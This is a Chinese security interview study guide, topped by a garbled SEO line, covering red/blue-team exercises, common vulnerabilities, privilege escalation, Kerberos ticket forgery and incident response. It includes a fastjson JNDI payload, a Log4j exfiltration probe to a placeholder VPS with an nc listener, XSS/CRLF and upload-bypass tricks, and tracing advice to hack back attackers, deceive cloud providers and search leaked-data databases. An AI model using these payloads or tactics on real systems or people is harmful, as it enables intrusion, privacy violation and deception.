网站案例库,时钟插件+wordpress,域名出售,网站后台密码在哪里文章目录 简单自我介绍上一个工作的主要内容Hvv的分组和流程你在hvv/攻防演练中取得了哪些成绩#xff1f; 二、渗透相关面试题基础端口号以及入侵方式OSI七层协议响应状态码都有哪些#xff1f;**WAF和IPS的区别**盲注是什么#xff1f;java内存马类型**内存马有几种类型**… 文章目录 简单自我介绍上一个工作的主要内容Hvv的分组和流程你在hvv/攻防演练中取得了哪些成绩 二、渗透相关面试题基础端口号以及入侵方式OSI七层协议响应状态码都有哪些**WAF和IPS的区别**盲注是什么java内存马类型**内存马有几种类型****shiro反序列化漏洞原理****Apache Log4j2 远程代码执行漏洞原理**bp怎么隐藏不让对方发现**为什么aspx的权限会比asp的权限更高****Windows和Linux利用REDIS有什么不一样****CRLF注入****反弹shell的原理是什么**文件上传怎么绕过csrf跟ssrf区别SSRF用哪些协议、函数怎么绕过修复**xss可以使用哪些标签****XSS弹窗函数和常见的XSS绕过策略****Mssql xp_cmdshell被禁用了怎么办****XXE中PCDATA和CDATA有什么区别****了解哪些中间件漏洞**Kali工具使用Burpsuite等工具抓包报错注入的原理是什么Webshell是什么原理是什么常用的Webshell管理工具冰蝎和菜刀等webshell工具有什么区别Redis未授权有了解吗Springboot 有哪些漏洞常见的网络服务器容器关系型非关系型 简单自我介绍
面试官您好我是陆承威。熟悉常见的TOP10漏洞有一定基本漏洞扫描和渗透能力 ,日志分析以及安全设备告警分析,能看懂安全产品然后在校期间也是参加过项目研发的。
上一个工作的主要内容
答主要是进行监测和辅助队友进行一个研判分析同时负责总结汇报情况并申请采取对相应机器进行隔离。
Hvv的分组和流程
HW分为蓝队和红队红队为常说的攻击队蓝队为防守队。蓝队一般分为初级监测组中级研判组高级应急溯源组
流程介绍一般开始前会进行资产梳理并通过漏洞扫描渗透测试以及基线检查等做一些自查一是可以减少暴漏面二是减少一些风险点。有些厂商还会利用几天的时间进行一次内部演练及时发现疏忽处并进行相应整改
作为一个新手小白主要做的就是坚守岗位监测与甲方合作的安全厂商的一些监测设备进行日志分析、IP封堵等其实这些都没有什么技术含量懂web安全和渗透测试基础的基本一看就会熟悉了当然部分厂商会对自己的合作伙伴们进行短期的产品培训。
你在hvv/攻防演练中取得了哪些成绩
答这是第二次参加国家级护网一共阻断超3000个恶意IP应急多起蠕虫病毒告警
二、渗透相关面试题
基础端口号以及入侵方式
ftp文件传输协议21弱口令匿名登陆
rdp端口3389远程代码执行
ssh端口22命令注入漏洞
telnet远程连接服务23弱口令暴力破解提权
smtp邮件协议25邮件伪造
pop3协议110弱口令
http、https服务80443常见的web攻击
snmp协议161爆破
ldap目录访问协议389未授权访问爆破
smb协议445永恒之蓝永恒之黑
rsync应用程序linux873未授权访问
mysql3306爆破注入
SQL server1433爆破注入攻击
oracle1521爆破注入攻击
redis6379弱口令未授权访问 连接命令redis-cli
postgresql5432注入爆破
mongodb27017爆破未授权
nfs协议2049未授权访问
zookeeper组件2181未授权访问
docker容器未授权访问docker逃逸
zebra路由协议套件弱口令信息泄露
squid代理服务器软件3128远程命令执行
svn版本控制系统3690信息泄露远程代码执行
rundeck服务平台4440跨站请求伪造。
vnc远程桌面共享协议5900弱口令未授权
couchdb数据库5984任意命令执行漏洞越权
weblogic中间件7001反序列化任意文件上传未授权
zabbix网络监控工具10050代码执行登陆绕过
tomcat中间件8080远程代码执行反序列化弱口令
jboss中间件8080反序列化未授权
jetty中间件8080、8443敏感信息泄露
jenkins中间件8080反序列化远程代码执行信息泄露
apache activemq后台服务开源信息代理用于实现消息传递模式。远程代码执行
fastcgi框架未授权ssrf
Hadoop框架未授权远程代码执行
elasticsearch监听端口是一个搜索引擎 9200未授权访问命令执行目录穿越
webmin-web控制面板系统管理工具管理unix系统web界面控制面板。远程命令执行
memcached监听端口是一个内存缓存软件。11211未授权命令执行OSI七层协议
物理层
数据链路层
网络层
传输层
会话层
表示层
应用层响应状态码都有哪些
404404 状态码表示请求资源不存在即表示攻击失败**200200 状态码表示请求成功但是请求成功并不代表攻击成功具体需要结合请求与 响应进行判断如下图攻击中攻击者尝试利用 Struts2 远程代码执行漏洞S2-045对目标 系统进行攻击响应状态码为 200。该漏洞攻击载荷在 HTTP 请求头部的 Content-Type分 析该攻击载荷如果漏洞存在的话会在响应的头部添加 testvuln 字段值为 1234x1234 即 1522756。分析响应的头部并未发现存在 testvuln 字段因此研判该漏洞攻击未成功。401401 状态表示未授权状态。该状态码返回常见于 HTTP 的 Basic 认证。500500 状态码表示服务器内部错误通常漏洞攻击也会导致出现 500 错误但是出现 500 错误并不表示攻击失败需要根据实际情况研判。301本状态码将浏览器【永久重定向】到另外一个在Location消息头中指定的URL。以后客户端应使用新URL替换原始URL。302本状态码将浏览器【暂时重定向】到另外一个在Location消息头中指定的URL.客户端应在随后的请求中恢复使用原始URL.
WAF和IPS的区别
答IPS位于防火墙和网络的设备之间防火墙可以拦截底层攻击行为但对应用层 的深层攻击行为无能为力。IPS是对防火墙的补充。综合能力更强一些WAF是工作在应用层的防火墙主要对web请求/响应进行防护。
盲注是什么
就是你在测试注入数据库的时候数据库没有任何回显只显示对错。
java内存马类型
filter listener servlet websocket javaagent
内存马有几种类型
内存马是一种在受感染的主机内存中运行的恶意软件。一般来说内存马可以分为以下几种类型
注入型内存马通过利用漏洞将恶意代码注入到正常进程中从而在内存中运行。
自执行型内存马将恶意代码写入自启动项启动后自动运行。
进程注入型内存马利用进程注入技术在受感染进程的内存中运行恶意代码。
Hook型内存马利用Windows API的Hook机制修改进程中的关键函数从而运行恶意代码。
要判断内存马的类型可以使用反病毒软件或专门的安全工具对受感染主机进行扫描和分析。一般来说不同类型的内存马会留下不同的痕迹和特征比如某些进程的不正常行为、异常的网络连接等等。
针对不同类型的内存马处理方法也会有所不同。一般来说可以采取以下措施
注入型内存马修复漏洞、升级软件加强网络安全防护等方法来预防类似攻击对已经感染的主机可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
自执行型内存马可以通过清理自启动项、卸载恶意程序等方式来清除内存马。
进程注入型内存马可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
Hook型内存马可以通过还原Hook、修复关键函数、杀掉受感染进程或卸载恶意程序等方式来清除内存马。shiro反序列化漏洞原理
浏览器或服务器重启后用户不丢失登录状态Shiro 支持将持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中下次读取时进行解密再反序列化。但是在 Shiro 1.2.4 版本之前内置了一个默认且固定的加密 Key导致攻击者可以伪造任意的 rememberMe Cookie进而触发反序列化漏洞Apache Shiro框架提供了记住密码的功能RememberMe用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值先base64解码然后AES解密再反序列化就导致了反序列化RCE漏洞那么Payload产生的过程 命令序列化AES加密base64编码RememberMe Cookie值在整个漏洞利用过程中比较重要的是AES加密的密钥如果没有修改默认的密钥那么就很容易就知道密钥了Apache Log4j2 远程代码执行漏洞原理
Apache Log4j2 框架中存在一个名为 JNDI Lookup 的功能它允许通过配置文件中的 JNDI 名称引用外部资源。攻击者构造一个特殊的日志消息其中包含恶意的 JNDI 名称并通过网络发送给受影响的应用程序。当应用程序使用 Log4j2 框架解析日志消息时它会尝试查找和引用该 JNDI 名称。如果恶意的 JNDI 名称指向一个恶意的远程资源例如恶意的 LDAP 服务器或 RMI 服务攻击者可以控制该远程资源的内容和行为。攻击者可以在恶意的远程资源中注入恶意代码并在目标系统上执行任意命令或获取敏感信息。bp怎么隐藏不让对方发现
代理设置-其他设置-禁用http://brup…代理设置-其他设置-忽略brup错误
为什么aspx的权限会比asp的权限更高
ASPX 和 ASP 都是用于创建动态Web页面的技术但它们的实现方式略有不同。
ASP 是经典的ASP技术它使用VBScript或JScript等脚本语言创建动态Web页面。在ASP中权限控制是通过服务器操作系统的权限机制实现的。
而ASPX是ASP.NET技术中的一部分它使用C#、VB.NET等编程语言创建Web页面。在ASP.NET中权限控制是通过.NET框架提供的安全机制实现的。这些机制包括代码访问安全性、角色管理和基于表单的身份验证等。
因此ASPX的权限控制比ASP更高因为它基于.NET框架提供的安全机制这些机制比操作系统的权限机制更强大和灵活。此外ASPX还提供了更多的安全选项例如加密会话状态和防止跨站点脚本攻击等。Windows和Linux利用REDIS有什么不一样
redis是一个非关系型数据库使用的默认端口是6379。常见的漏洞是未授权访问漏洞攻击者无需认证就可以访问内部数据。
性能Redis在Linux上运行的性能通常比在Windows上运行的性能更好这是由于Linux系统的设计和优化使得其能够更好地利用系统资源。
可用性在Windows上运行Redis时其可用性通常会受到操作系统的限制例如系统的最大打开文件数和最大连接数等。而在Linux上这些限制通常可以通过修改系统配置文件来解决。
安全性Redis的安全性与其在Windows或Linux上运行的方式无关但是在实践中由于Windows和Linux的不同权限模型和安全机制使用Redis时需要采取不同的安全措施。例如在Linux上可以使用文件系统权限和防火墙规则来保护Redis服务器而在Windows上需要使用Windows防火墙和用户权限来保护Redis服务器。CRLF注入
Nginx中常见的中间件漏洞
CRLF注入也称为HTTP头注入是一种攻击技术攻击者通过注入CRLF字符序列即回车换行来改变HTTP头部的内容从而实现各种攻击目的例如HTTP响应拆分、HTTP重定向、会话劫持等。
攻击者通常会将CRLF字符序列注入到HTTP请求或响应的参数中例如Cookie、User-Agent、Referer等。在受害者的Web应用程序中如果没有对这些参数进行有效的输入验证和过滤那么CRLF字符序列就会被当作有效的HTTP头部分隔符并导致HTTP头部的内容被注入。
例如攻击者可以将以下内容作为User-Agent参数发送给Web应用程序
User-Agent: scriptalert(CRLF Injection)/script\r\n\r\nHTTP/1.1 200 OK
在这个例子中攻击者在User-Agent参数中注入了CRLF字符序列以便将HTTP响应头部分隔为两个部分。第一个部分是攻击者自己构造的HTTP响应头部分第二个部分则是Web应用程序返回的HTTP响应体。
如果Web应用程序没有对这个User-Agent参数进行有效的输入验证和过滤那么攻击者就可以成功地将自己构造的HTTP响应头部发送给受害者浏览器从而实现各种攻击目的。例如攻击者可以在自己构造的HTTP响应头中设置Location字段将用户重定向到恶意站点从而实现HTTP重定向攻击。或者攻击者可以在自己构造的HTTP响应头中设置Set-Cookie字段从而实现会话劫持攻击。
为了防止CRLF注入攻击Web应用程序应该对所有HTTP请求和响应参数进行有效的输入验证和过滤包括Cookie、User-Agent、Referer等。在输入验证和过滤时应该使用白名单过滤的原则只允许合法的字符集通过而拒绝所有不合法的字符。同时Web应用程序应该使用最新的安全框架和库来保护自己以及及时更新系统和软件的安全补丁。反弹shell的原理是什么
利用TCP协议传了一个bash环境
文件上传怎么绕过
因为是黑盒测试你不知道它的检测规则是怎么样的看看对哪方面做了检测有可能只是前端检测再针对的去绕过一般的话我先根据后端语言去跑一遍后缀名字典然后去尝试各种方法例如变换大小写插入各种特殊字符像%00、单引号、换行符去构造一些畸形的数据包csrf跟ssrf区别
CSRF (Cross-site request forgery)跨站请求伪造SSRF (Server-Side Request Forgery)服务器端请求伪造csrf 一个是客户端发起ssrf是从服务端发起的SSRF用哪些协议、函数怎么绕过修复
file、dict、ldap、gopher可以利用curl函数、file_get_contents()函数、fsockopen()
绕过使用短网址、进制转换、302跳转、DNS重绑
修复禁止不需要的协议、设置URL白名单、统一返回信息、限制请求的端口xss可以使用哪些标签
这个太多了常用的就
scriptaiframeEMBEDsvgbody objectformimgXSS弹窗函数和常见的XSS绕过策略
**弹窗函数**alert、confirm、prompt、onclick**绕过策略**大小写混写双写img/src1%0a或者%0d绕过拼凑绕过
Mssql xp_cmdshell被禁用了怎么办
先看看能不能手动启用不能的话看看有没有其他的扩展存储可以利用有的可以执行系统命令记得有的可以直接操作注册表也可以利用CLR技术类似于mysql中的UDF吧可以直接使用16进制代码来创建自定义函数XXE中PCDATA和CDATA有什么区别
PCDATA就是被解析的字符数据会被解析CDATA属于不会被解析器解析的文本了解哪些中间件漏洞
IIS有解析漏洞PUT任意文件写入漏洞短文件漏洞Apache也有解析漏洞然后目录遍历遇到的比较多Tomcat的话war后门部署、远程代码执行jBoss和WebLogic的话就反序列化漏洞weblogic还有ssrf漏洞任意文件上传Kali工具使用
wiresharkBurpsuite等工具抓包
开代理将关键数据send to repeater,修改报错注入的原理是什么
在MYSQL中使用一些指定的函数来人为制造报错后台没有屏蔽数据库报错信息 在语法发生错误使得查询结果能够出现在错误信息中回显在前端从而从报错信息中获取设定的信息。Webshell是什么原理是什么
WebShell就是一句话木马由于脚本语言的动态性木马文件通过命令执行system函数或者代码执行eval函数等参数为用户外部传入如GET传参POST传参达到执行任意代码任意命令的功能。从而远程控制目标主机常用的Webshell管理工具
冰蝎蚁剑哥斯拉菜刀冰蝎和菜刀等webshell工具有什么区别
答冰蝎有流量动态加密Redis未授权有了解吗
答有可以配合ssrf打组合拳
Springboot 有哪些漏洞
答只知道一个snakeyaml
常见的网络服务器容器
IIS、Apache、nginx、Lighttpd、Tomcat ### 序列化与反序列化的区别
序列化把对象转化为可传输的字节序列过程称为序列化 反序列化把字节序列还原为对象的过程称为反序列化 ### 正向SHELL和反向SHELL的区别
正向shell攻击者连接被攻击者机器反向shell被攻击者主动连接攻击者正向代理客户端代理服务器不知道实际发起请求的客户端反向代理服务器代理客户端不知道实际提供服务的服务端 ### xxe原理与攻击手法答解析XML输入时可以加载外部实体类造成文件读取命令执行等危害。直接dtd加载dnslog等等### xss除了获取cookie还能干什么答用户劫持、结合csrf补充貌似能提权### ssrf的原理与危害答伪造服务器给内网发消息### ssrf和csrf有什么区别答csrf伪造客户端ssrf伪造服务器端### 如何寻找注入点答字符数字盲注…### 有用过sql注入传马吗答用过into outfile补充可以通过日志文件写入木马### –os-shell的条件答拥有网站的写入条件补充Secure_file_priv参数为空或者为指定路径。### 内存马免杀有做过吗具体说说答没做过在网上找现成的补充Filter名称是否合理Filter对应的类名是否合理Filter对应的类是否在classpath下网站web.xml中是否存在改filter### 不借助dnslog有办法检测log4j2是否出网吗答dns到vps判断是否出网补充使用logg.error(“KaTeX parse error: Expected ‘}’, got ‘EOF’ at end of input: …s://xxxxx:8090/{java:version}}”);在自己的VPS上nc -luvvp 8090即可收到信息### 你是如何验证struts2是否存在的答检测工具或者抓包改post把content-Type改为application/xml,放上payload### 数据库有哪些关系型的和非关系型的分别是哪些
关系型
MySQL3306
SQL Server1433
Oracle1521
DB25000
MongoDB27017 非关系型
Redis6379
Memcached11211
PHP反序列化 ### PHP代码执行的危险函数
call_user_func() call_user_func_array() create_function() array_map() ### PHP命令执行函数
system shell_exec passthru exec popen proc_open putenv assert ### linux和windows怎么判断linux大小写敏感### 什么是免杀将shellcode进行加密动态解密恢复申请可写可执行内存并写入解密后的shellcode将函数指针指向这块内存的起始位置并开始执行。### 免杀有几种途径答修改特征码、流量混淆、花指令、加壳### Java常见的框架中间件及漏洞#### struct2框架
一个基于MVC设计模式的Web应用框架)这个框架全是漏洞 #### fastjson框架阿里巴巴开源的JSON工具解析库1.2.47版本前存在反序列化漏洞框架特征post数据包content-type为application/json, post内容为json数据且其中有type标识比如
{ “a”:{ “type”:“java.lang.Class”, “val”:“com.sun.rowset.JdbcRowSetImpl” }, “b”:{ “type”:“com.sun.rowset.JdbcRowSetImpl”, “dataSourceName”:“rmi://127.0.0.1:1099/Exploit”, “autoCommit”:true }} #### shiro框架apache的一个权限管理的开源框架,实现 用户认证、用户授权。若shiro框架服务端使用默认密钥则会存在反序列化漏洞框架特征cookie字段为存在rememberMexxxxx;#### weblogic容器一个基于JAVAEE架构的中间件weblogic存在许多漏洞弱口令SSRF反序列化任意文件上传XMLDecoder反序列化框架特征一般在7001端口漏洞检测常用工具#### tomcat容器最常见的java web容器漏洞弱口令幽灵猫PUT方法任意写文件框架特征一般为8080端口### 云函数了解吗怎么防御1. C2客户端发出的流量经过云函数转发到达C2服务器因为云函数的服务器是自带CDN的从而达到隐藏的效果。
2. 封禁域名**apigw.tencentcs.com**# 四、内网相关面试题### Windows和Linux提权的方法1. Windows内核漏洞、可修改的服务、服务路径缺陷、可修改的计划任务、psexec、bybassuac
2. Linuxsuid、定时任务、内核漏洞、sudoer### Windows系统提权的思路提权可分为纵向提权与横向提权纵向提权低权限角色获得高权限角色的权限横向提权获取同级别角色的权限。
方法 1.系统内核溢出漏洞提权 2.数据库提权 3.错误的系统配置提权 4.组策略首选项提权 5.WEB中间件漏洞提权 6.DLL劫持提权 7.滥用高危权限令牌提权 8.第三方软件/服务提权等 ### Linux有哪些提权思路常用的就内核提权、sudo滥用提权、suid提权、一些高权限运行的应用服务提权例如mysql、python、vi、定时任务提权、etc/passwd滥用提权
方法1.Linux内核漏洞提权2.低权限用户目录下可被Root权限用户调用的脚本提权SUID3.环境变量劫持高权限程序提权4.sudoer配置文件错误提权 ### **说一下Linux利用passwd提权**这个需要对passwd有写入权限正常root用户的uid为0如果自己写进去一个用户把它的uid改为0的话用这个用户登录系统就会切到root用户了### suid提权的原理通过文件属主的身份运行文件### bypassuac的方法白名单、COM 接口、Shell API也可以通过工具UACME### 黄金白银票据1. 黄金票证是一种权限维持手段攻击者获得了对 AD 密钥分发服务帐户的控制权并使用该帐户伪造 TGT便能够访问 域上的任何资源。
2. 白银票据是伪造的 TGS 票证白银票仅允许攻击者伪造特定服务的 TGS 票据。### 详细讲一下金票以及需要的信息AS认证中返回的TGT是由krbtgt用户的密码Hash加密的有krbtgt的密码hash就可以自己制作任意的TGT
需要域名、域SID、要模拟的用户名、krbtgt的hash### 读hash读取不到怎么办用工具把lsass进程dump下来然后本地去读或者转储sam文件AD数据库的话可以用dcsync的方式转出来### dcsync的利用条件
需要配置两个ACL的权限就可以了 ### 详细讲一下ACLACL就是访问权限windows下不同的用户组有默认的ACL配置你也可以单独添加权限这样就算普通用户也可以给他添加向域管组添加用户的权限### psexec和wmic区别psexec会有大量的日志wmic就不会### **PTT有哪些攻击方法**MS14-068、金票、银票### 内网扫描的方式内网fscan扫描 或者 搭建内网socks5代理然后走代理进行扫描### **Liunx系统中任何权限都能访问的临时文件位置**答/var/tmp### **正向代理 反向代理的区别啊**正向代理和反向代理是两种不同的代理服务器架构。
正向代理Forward Proxy是代理服务器位于客户端与目标服务器之间的一种代理方式。客户端发送请求时先将请求发送到代理服务器然后代理服务器再将请求发送到目标服务器。在这个过程中客户端并不知道请求是由代理服务器发出的只知道代理服务器的地址。正向代理常用于客户端无法直接访问目标服务器的情况下比如防火墙的限制、访问限制等。
反向代理Reverse Proxy是代理服务器位于目标服务器与客户端之间的一种代理方式。客户端发送请求时请求先到达反向代理服务器然后由反向代理服务器将请求转发到目标服务器目标服务器将响应发送给反向代理服务器最后再由反向代理服务器将响应发送给客户端。在这个过程中客户端不知道请求是由目标服务器响应的只知道反向代理服务器的地址。反向代理常用于负载均衡、缓存、安全等方面。
在实际应用中常常使用反向代理作为Web服务器的入口来处理负载均衡、安全过滤、缓存等问题同时使用正向代理来提高用户体验隐藏客户端真实IP地址保护隐私等# 五、应急响应面试题## 1.内存马应急(重点)### **内存马有几种类型**内存马是一种在受感染的主机内存中运行的恶意软件。一般来说内存马可以分为以下几种类型
注入型内存马通过利用漏洞将恶意代码注入到正常进程中从而在内存中运行。
自执行型内存马将恶意代码写入自启动项启动后自动运行。
进程注入型内存马利用进程注入技术在受感染进程的内存中运行恶意代码。
Hook型内存马利用Windows API的Hook机制修改进程中的关键函数从而运行恶意代码。
要判断内存马的类型可以使用反病毒软件或专门的安全工具对受感染主机进行扫描和分析。一般来说不同类型的内存马会留下不同的痕迹和特征比如某些进程的不正常行为、异常的网络连接等等。
针对不同类型的内存马处理方法也会有所不同。一般来说可以采取以下措施
注入型内存马修复漏洞、升级软件加强网络安全防护等方法来预防类似攻击对已经感染的主机可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
自执行型内存马可以通过清理自启动项、卸载恶意程序等方式来清除内存马。
进程注入型内存马可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
Hook型内存马可以通过还原Hook、修复关键函数、杀掉受感染进程或卸载恶意程序等方式来清除内存马。### 内存马你怎么查杀**内存马如何排查如果发现了一些内存webshell的痕迹需要有一个排查的思路来进行跟踪和分析也是根据各类型的原理
列出一个排查思路——1、如果是jsp注入日志中排查可以jsp的访问请求。
2、如果是代码执行漏洞排查中间件的error.log,查看是否有可疑的报错判断注入时间和方法。
3、根据业务使用的组件排查可能存在的java代码执行漏洞spring的controller了类型的话根据上报webshell的url查找日志filter或者listener类型可能会有较多的404但是带有参数的请求。
杀马
终止进程如果确认某个进程是内存马可以尝试终止该进程。在Windows系统中可以通过任务管理器或者命令行工具taskkill来终止进程在Linux系统中可以通过命令行工具kill或者pkill来终止进程。
删除文件如果进程终止后还需要删除相关的文件以防止内存马重新启动。在Windows系统中可以直接删除相关文件在Linux系统中需要先终止进程然后再删除文件。### **怎么排查java内存马**直接利用内存马检测工具去找github也有很多检测脚本手工的话可以分析web日志filter或者listener类型的内存马会有大量路径相同参数不同的url请求或者页面不存在但是返回200的请求分析web.xml文件内存马的Filter是动态注册的web.xml是没有配置的也有可能是中间件漏洞通过代码执行加载内存马这就可以去排查中间件的错误日志像哥斯拉和冰蝎的内存马也会有跟webshell相似的特征分析特殊的classloader加载攻击者喜欢利用TemplatesImpl和bcel加载内存马因为内存马是驻留在内存里的本地无class文件通过检测Filter对应的ClassLoader目录下是否存在class文件来判断也可以把内存中所有的Filter的class dump出来使用工具分析是否存在恶意代码## 2.溯源### 溯源反制1. 通过 ip 定位物理位置对 ip 进行端口扫描进行反渗透
2. 通过社交 ID 进行追踪
3. 通过 ip 查域名、查邮箱、电话对域名进行溯源分析
4. 如果有恶意样本可通过分析恶意样本看是否存在攻击者信息
5. 通过蜜罐进行反制
6. 也可以进行反钓鱼## **溯源有哪些思路**通过分析设备的告警、钓鱼邮件、木马病毒找到攻击者IP先去一些威胁情报平台搜索相关信息判断攻击者为代理服务器还是跳板机还是国内的云服务器查一查相关注册信息对攻击者进行反向渗透针对攻击者去搭建蜜罐如果是云服务器可以寻找到相关厂商联系客服说自己忘记密码了看看能不能获取到云服务器购买者信息对于获取到的信息可以通过各种社工库搜一搜各大搜索引擎去搜索看看能不能获取到更多信息也可以直接把服务器厂商打下来肯定就可以知道购买者的信息了如果把跳板机拿下就可以去查看桌面的敏感信息登录日志历史执行命令这样一步一步去获取更多的信息。### 你会用什么办法溯源攻击方的个人信息呢1. 首先通过日志和蜜罐等方式获取到攻击方的 ip可以对 ip 进行反向渗透获取信息定位攻击者信息。
2. 也可以通过搜索引擎或者安全情报获取 ip 对应攻击者的网名id再通过社交平台获取攻击者的信息
3. 通过攻击 IP 历史解析记录/域名对域名注册信息进行溯源分析
4. 如果攻击者有种植木马等可以提取样本特征如用户名、ID、邮箱、C2 服务器等信息—同源分析
5. 搭载 jsonp 钓鱼的蜜罐通过 JSONP 跨域获取攻击者的主机信息、浏览器信息、真实 IP 及社交信息等### **怎么做溯源国外ip怎么溯源国内ip怎么溯源**溯源思路首先通过系统日志、安全设备截获攻击包等从中分析出攻击者的ip和攻击方式通过webshell或者木马去微步分析
或者去安恒威胁情报中心进行ip检测分析是不是云服务器基站等如果是云服务器的话可以直接反渗透看看开放端口域名whois等进行判断
获取姓名电话等丢社工库看看能不能找到更多信息然后收工
针对国外IP的溯源方法
使用网络安全工具进行溯源可以使用网络安全工具如traceroute、ping等命令对目标IP进行探测和跟踪。这些工具可以显示出攻击流量经过的路由器、网关和ISP等信息帮助我们了解攻击流量的来源地点。
查找域名信息通过WHOIS查询工具查询目标域名的注册信息包括注册人、注册机构、联系方式等信息可以从中了解到攻击来源的大致位置。
联系当地ISP如果攻击者使用的是公共网络如酒店、咖啡厅、机场等可以联系当地ISP寻求协助获取攻击来源的信息。### **针对国内IP的溯源方法**使用网络安全工具进行溯源同样可以使用traceroute、ping等命令进行溯源显示攻击流量经过的路由器和ISP等信息帮助我们确定攻击来源的大致位置。
查找公网IP地址通过IP地址查询工具查询目标IP的公网IP地址可以从中了解到攻击来源的大致位置。
联系当地ISP如果攻击者使用的是公共网络如网吧、公共WiFi等可以联系当地ISP寻求协助获取攻击来源的信息。### **有没有接触过溯源反制啊**溯源反制的原理主要是通过混淆和伪装攻击流量防止攻击者获取真实的攻击来源和行为信息。具体操作包括
使用代理服务器通过使用代理服务器可以改变攻击流量的来源IP地址使得攻击者无法追踪真实的攻击来源。
使用VPN技术VPN技术可以在公网上建立一个私有网络加密传输数据流量从而防止攻击者获取敏感信息。
使用匿名浏览器匿名浏览器可以隐藏用户真实的IP地址和浏览痕迹使得攻击者无法追踪用户的真实身份和行为。
使用虚假数据在攻击流量中混入虚假的数据如虚假的IP地址、协议和端口等信息可以混淆攻击者的追踪。### **已知攻击者IP如何溯源定位攻击人员**
1、IP反查注册信息可能会查询到域名通过域名查询备案和whois信息可能会查出邮箱电话通过社工库查询相关邮箱和电话信息定位人员支付宝微信转账微博百度贴吧等 2、通过白泽系统查询IP标记情况查看攻击者IP日常访问数据内容判断攻击者人员信息 ### **溯源会用些什么工具或者在线网站都可以说说常用的服务和对应的端口**查入侵IP入侵手法网路攻击事件的确定等
工具可以用wireshark进行溯源取证
WiresharkWireshark 是一款免费开源的网络协议分析工具可以捕获和分析网络数据包。通过使用 Wireshark您可以追踪网络数据流和操作记录了解数据的来源、目的和内容等信息。 Sysinternals SuiteSysinternals Suite 是一组 Windows 系统工具集合其中包括了很多用于溯源的工具。例如Process Monitor 可以监视 Windows 系统中的进程和操作记录用于追踪应用程序和系统资源的使用情况Regmon 可以监视系统注册表的操作记录用于追踪应用程序对系统注册表的读写操作。 SIFTSIFTSANS Investigative Forensic Toolkit是一款专业的数字取证工具集用于支持取证人员对数字媒体进行取证分析。SIFT 包含了很多工具例如Autopsy 可以分析磁盘映像文件Volatility 可以分析内存映像文件用于追踪系统的操作记录和数据流。 Sleuth KitSleuth Kit 是一款开源的数字取证工具集提供了一系列用于分析文件系统和磁盘映像文件的工具。例如fls 工具可以分析文件系统中的文件记录用于追踪文件的创建、修改和删除记录mactime 工具可以分析文件系统中的时间戳记录用于追踪文件的时间戳信息。 在线网站微步* 安恒威胁情报中心 全国互联网违法和不良信息举报中心 工业和信息化部网络安全管理局
溯源思路首先通过系统日志、安全设备截获攻击包等从中分析出攻击者的ip和攻击方式通过webshell或者木马去微步分析
或者去安恒威胁情报中心进行ip检测分析是不是云服务器基站等如果是云服务器的话可以直接反渗透看看开放端口域名whois等进行判断
获取姓名电话等丢社工库看看能不能找到更多信息然后收工## **应急响应要干什么啊**应急响应通常包括以下步骤
确认安全事件要及时发现安全事件快速确认其类型、范围和危害程度并进行预警和通报。
切断攻击链要采取有效措施尽可能快地切断攻击链阻止攻击扩散和进一步损失。
收集证据要收集、保留安全事件相关的证据和信息以便后续的调查和追踪。
分析病毒特征要对病毒、木马等安全事件的特征进行分析找出其入侵方式、攻击目的、传播途径等信息以便防止类似安全事件的再次发生。
应对措施根据安全事件的类型和程度采取相应的应对措施如修补漏洞、清除恶意软件、升级补丁、修改配置等。
恢复业务在限制损失和消除安全风险的基础上尽快恢复业务保障用户和业务的正常运转。
事件总结要对安全事件的应急响应过程进行总结和反思发现问题并进行改进提高应急响应能力。
常见的应急响应事件分类web入侵网页挂马、主页篡改、Webshell 系统入侵病毒木马、勒索软件、远控后门 网络攻击DDOS攻击、DNS劫持、ARP欺骗 网站被挂马如何应急具体流程都是差不多的看着变
1.取证登录服务器备份检查服务器敏感目录查毒搜索后门文件-注意文件的时间 用户后缀等属性调取日志系统中间件日志WAF日志等
2.处理恢复备份快照回滚最近一次确定入侵方法漏洞检测并进行修复
3.溯源查入侵IP入侵手法网路攻击事件的确定等
4.记录归档--------预防-事件检测-抑制-根除-恢复-跟踪-记录通用漏洞的应对等其他 安全应急事件 判断威胁情报是否有误就看wireshark进行流量分析判断是否为正常业务操作## **应急响应流程**收集信息收集告警信息、客户反馈信息、设备主机信息等
判断类型判断攻击的类型是ddos还是被挂马了还是被控制了
控制范围隔离目标网络不让危害扩大
寻找原因还原攻击者的攻击链溯源攻击者的整个过程
修复防御直接封掉攻击者ip对于产生的原因进行对应防御
恢复业务将业务恢复正常
写报告总结整个过程反思不足之处优化应急方案## 安全设备发现一台Linux主机触发挖矿告警上机排查该机器执行pstop命令未发现挖矿及恶意进程现在怀疑pstop命令被替换动态链接库被劫持请问应该如何处理**
1、使用cat /etc/ld.so.preload命令查看动态链接库文件是否加载有so文件提取加载的so文件上传至威胁情报平台判断是否为恶意so文件2、清除so文件使用ldconfig命令重新加载动态链接库执行pstop命令查看是否可以发现挖矿进程信息 3. 确认ps和top命令是否被替换可以使用命令which ps和which top查看这两个命令的路径是否为系统默认路径/bin/ps和/usr/bin/top如果不是则说明被替换。也可以通过比较ps和top命令的md5值来判断是否一致。2. 确认动态链接库是否被劫持可以使用命令ldd /bin/ps和ldd /usr/bin/top查看这两个命令依赖的动态链接库是否正常如果有动态链接库被替换则会发现其中一些动态链接库路径不对 4. 恢复被替换的命令和动态链接库如果确认被替换可以从系统安装介质或官方网站上下载对应版本的ps和top命令和动态链接库替换掉被替换的文件即可。 5. 检查系统安全替换命令和动态链接库只是暂时的措施需要进一步排查系统安全状况比如查杀恶意程序、加强访问控制、更新系统补丁等以防止类似问题再次发生 6. 借助工具busybox ## **如何分析排查钓鱼邮件事件**
1.确认邮箱批量发送时间点 2.排查邮箱登录日志发现【恶意IP】在【什么时间】通过web登录成功; 3.查看邮件内容确认钓鱼邮件的影响和目的 4.排查浏览器或上网行为判断是否访问过钓鱼页面 5.对访问过的设备进行全盘查杀 分析邮件头部查看邮件的原始头部信息 检查发件人的真实地址、邮件服务器的来源、邮件传输路径等 注意查看Received字段查看是否存在异常的邮件转发或代理 分析链接与附件添加至黑名单 查看有多少内网ip访问过这个链接或者ip双向排查 ## 怎么排查 0day1. 先对失陷的机器进行隔离进行口令策略加固封禁入侵IP
